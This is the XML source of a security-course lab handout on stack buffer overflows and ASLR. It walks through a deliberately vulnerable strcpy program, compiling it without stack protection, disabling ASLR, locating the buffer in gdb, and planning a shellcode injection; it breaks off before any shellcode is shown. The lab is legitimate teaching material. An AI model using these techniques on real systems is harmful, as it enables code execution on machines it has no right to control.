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1B8" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="37A4DD1A" w14:textId="06BF3644">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824B4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SOPS – Buffer overflow and ASLR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="7091846D" w14:textId="19922C81">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="17C221B7" w14:textId="50A6F421">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="2FF06617" w14:textId="3DC49FDF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00C57E96" w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="3B35F5CB" w14:textId="6343FE3D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57E96">
        <w:t>In today’s laboratory we will see how we can obtain a shell exploiting a buffer overflow vulnerability. A code which is vulnerable can be exploited to make it run malicious code. This method of attack is quite old, but still widely used, but because it is old operating systems and compilers added methods to prevent attack execution, protecting executables of possible exploitation of badly written code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C57E96" w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="427D68CA" w14:textId="072A660A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57E96">
        <w:t>Let’s take a look at the following vulnerable code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C57E96" w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="2BF1A008" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00C57E96" w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="6F951298" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57E96">
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57E96">
        <w:t>stdlib.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57E96">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C57E96" w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="44F73A31" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57E96">
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57E96">
        <w:t>stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57E96">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C57E96" w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="5B805612" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57E96">
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57E96">
        <w:t>string.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57E96">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C57E96" w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="6572DC6F" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57E96">
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57E96">
        <w:t>func</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57E96">
        <w:t>(char *string)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C57E96" w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="027F7DBF" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57E96">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C57E96" w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="7007BFAE" w14:textId="42F70400">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57E96">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57E96">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C57E96">
        <w:t>char buffer[128];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C57E96" w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="7451785C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57E96">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57E96">
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57E96">
        <w:t>(buffer, string);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C57E96" w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="748365D1" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57E96">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C57E96" w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="6FE601A0" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57E96">
        <w:t xml:space="preserve">int main(int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57E96">
        <w:t>argc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57E96">
        <w:t>, char *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57E96">
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57E96">
        <w:t>[])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C57E96" w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="65D95D52" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57E96">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C57E96" w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="5EDDF8EA" w14:textId="77777777">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57E96">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57E96">
        <w:t>func</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57E96">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57E96">
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57E96">
        <w:t>[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C57E96" w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="04A318F4" w14:textId="77777777">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57E96">
        <w:t xml:space="preserve"> return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C57E96" w:rsidR="00824B4E" w:rsidP="00824B4E" w:rsidRDefault="00824B4E" w14:paraId="00994A8E" w14:textId="17E69A09">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57E96">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57E96" w:rsidP="00824B4E" w:rsidRDefault="00C57E96" w14:paraId="04B01886" w14:textId="13671701">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57E96">
        <w:t xml:space="preserve">We will want to compile it </w:t>
      </w:r>
      <w:r>
        <w:t>for 32-bit architecture to be easier to prove the attack. To do this we will have to run the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57E96" w:rsidP="00824B4E" w:rsidRDefault="00C57E96" w14:paraId="74EA2D45" w14:textId="5E20F926">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -g -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>m32</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -o ex </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ex.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> where in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ex.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we previously saved the code from above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57E96" w:rsidP="00824B4E" w:rsidRDefault="00C57E96" w14:paraId="32030E6F" w14:textId="4F40CF3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If you are on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>x64</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> architecture your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> might not have -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>m32</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> option, so to have it you have to install the following packages:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57E96" w:rsidP="00824B4E" w:rsidRDefault="00C57E96" w14:paraId="045ABC91" w14:textId="7BEBDB72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> apt-get install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc6</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-dev-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i386</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gcc-multilib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C57E96" w:rsidP="00824B4E" w:rsidRDefault="00C57E96" w14:paraId="7F9B12C9" w14:textId="224EB04F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C57E96" w:rsidP="00C57E96" w:rsidRDefault="00C57E96" w14:paraId="3FCE7EF9" w14:textId="0807EB20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Buffer overflow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57E96" w:rsidP="00C57E96" w:rsidRDefault="0051720E" w14:paraId="32D3DF60" w14:textId="0E7EA8E3">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>If you look at the code, the only thing the code is doing is to call a function with the argument we pass to the program. This function copies the string passed as an argument in a local variable defined on the stack of the function. Because of the way in which we copy the string (without checking the size) we may get a buffer overflow if we pass as an argument a string bigger than 128 characters. Lets remember how the stack looks like when we call a function:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051720E" w:rsidP="00C57E96" w:rsidRDefault="0051720E" w14:paraId="2C21C2F0" w14:textId="664EDB22">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>name-parameters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051720E" w:rsidP="00C57E96" w:rsidRDefault="0051720E" w14:paraId="7A3982FC" w14:textId="08F3812C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>return address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051720E" w:rsidP="00C57E96" w:rsidRDefault="0051720E" w14:paraId="00AF1AD4" w14:textId="714F8652">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>base pointer(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051720E" w:rsidP="00C57E96" w:rsidRDefault="0051720E" w14:paraId="12E0E171" w14:textId="6592362F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>different other registers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051720E" w:rsidP="00C57E96" w:rsidRDefault="0051720E" w14:paraId="3535A216" w14:textId="7B79D55A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>buffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051720E" w:rsidP="00C57E96" w:rsidRDefault="0051720E" w14:paraId="0BFAE099" w14:textId="3CE72B2D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>…..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051720E" w:rsidP="00C57E96" w:rsidRDefault="0051720E" w14:paraId="0B702D26" w14:textId="558F13FE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>So, if we put in the buffer more than 128 characters we will overwrite the stack and putting enough extra characters we will be able to overwrite the return address, making the program to jump to a different address where we can take over the flow of program execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051720E" w:rsidP="00C57E96" w:rsidRDefault="0051720E" w14:paraId="6CFED71B" w14:textId="13607B70">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To be able to pass non printable characters as an argument to an executable we will need to install python – to do so you have to run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> apt-get install python. </w:t>
      </w:r>
      <w:r w:rsidR="00DA12FF">
        <w:t>If we ran this command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA12FF" w:rsidP="00C57E96" w:rsidRDefault="00DA12FF" w14:paraId="776C3C65" w14:textId="51892D8B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA12FF">
        <w:t>./ex $(python -c 'print (128*"A")')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  we will ran ./ex AAAAA…A (128 of A).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA12FF" w:rsidP="00C57E96" w:rsidRDefault="00DA12FF" w14:paraId="16A5059D" w14:textId="76AA3702">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA12FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Practic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA12FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Now </w:t>
      </w:r>
      <w:r w:rsidR="004F214C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>try to run the executable with a buffer with which you try to overwrite the return address. See what happens.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F214C" w:rsidP="00C57E96" w:rsidRDefault="004F214C" w14:paraId="7B0D406F" w14:textId="2A716206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As we were saying above there are some stack protection mechanism and on the stack are added by the compiler canaries before the return address, if those values are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>overwriten</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the program will crash considering the program might be exploited. To disable this protection when we compile the program we have to disable stack protection, so we will compile the executable with this command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F214C" w:rsidP="00C57E96" w:rsidRDefault="004F214C" w14:paraId="5ACA3800" w14:textId="00746522">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -g -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>m32</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-stack-protector -o ex </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ex.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F214C" w:rsidP="00C57E96" w:rsidRDefault="004F214C" w14:paraId="0C586B86" w14:textId="22CC7A24">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F214C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Practic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F214C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Now rerun the program with the buffer you used before and see what happens. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F214C" w:rsidP="004F214C" w:rsidRDefault="004F214C" w14:paraId="19766CBB" w14:textId="174D8598">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F214C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Preparing the attack </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F214C" w:rsidP="004F214C" w:rsidRDefault="004F214C" w14:paraId="140AE6D2" w14:textId="3940070F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We will try to create the following attack </w:t>
      </w:r>
      <w:r w:rsidR="00F54BD8">
        <w:t xml:space="preserve">– in the buffer we will try to put executable code which will start a shell and we will try to overwrite the return code with the address of our buffer. </w:t>
      </w:r>
      <w:r w:rsidR="002139B8">
        <w:t xml:space="preserve">ASLR </w:t>
      </w:r>
      <w:r w:rsidR="00C4268B">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="002139B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C4268B">
        <w:t xml:space="preserve">Address Space Layout </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C4268B">
        <w:t>Randomisation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C4268B">
        <w:t xml:space="preserve"> is another protection mechanism </w:t>
      </w:r>
      <w:r w:rsidRPr="00C4268B" w:rsidR="00C4268B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>which involves randomly positioning the base address of an executable and the position of libraries, heap, and stack, in a process's address space.</w:t>
      </w:r>
      <w:r w:rsidR="00C4268B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> This way the variables will be loaded at every run at different address. To have a constant address for our buffer we want to exploit we will disable ASLR using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C4268B" w:rsidP="004F214C" w:rsidRDefault="00C4268B" w14:paraId="685B972C" w14:textId="4E847058">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">echo 0 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tee /proc/sys/kernel/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>randomize_va_space</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C4268B" w:rsidP="004F214C" w:rsidRDefault="00B90CB8" w14:paraId="49D6C113" w14:textId="100F0C3E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">To find the buffer address we will run the program from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90CB8" w:rsidP="004F214C" w:rsidRDefault="00B90CB8" w14:paraId="2C55574E" w14:textId="570F04EC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ./ex </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>some_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B90CB8" w:rsidP="004F214C" w:rsidRDefault="00B90CB8" w14:paraId="763CB4A3" w14:textId="6CCF1ACC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">b </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>func</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004662F7" w:rsidP="004F214C" w:rsidRDefault="004662F7" w14:paraId="6044068F" w14:textId="7A07A122">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90CB8" w:rsidP="004F214C" w:rsidRDefault="00B90CB8" w14:paraId="7A50C04D" w14:textId="7E958F52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>p &amp;buffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00543EC0" w:rsidP="004F214C" w:rsidRDefault="00543EC0" w14:paraId="4AA82982" w14:textId="22A64231">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On my computer the address for the buffer is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>0xffffd04c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. So we will want to overwrite the return address with this value and in our buffer we will want to put a shell code which will start a shell. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00543EC0" w:rsidP="004F214C" w:rsidRDefault="00543EC0" w14:paraId="5F462724" w14:textId="6EF32065">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Here is a code which starts a shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00543EC0" w:rsidR="00543EC0" w:rsidP="23B1D41A" w:rsidRDefault="00543EC0" w14:paraId="0B10B0F4" w14:textId="2CABEA30">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00543EC0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
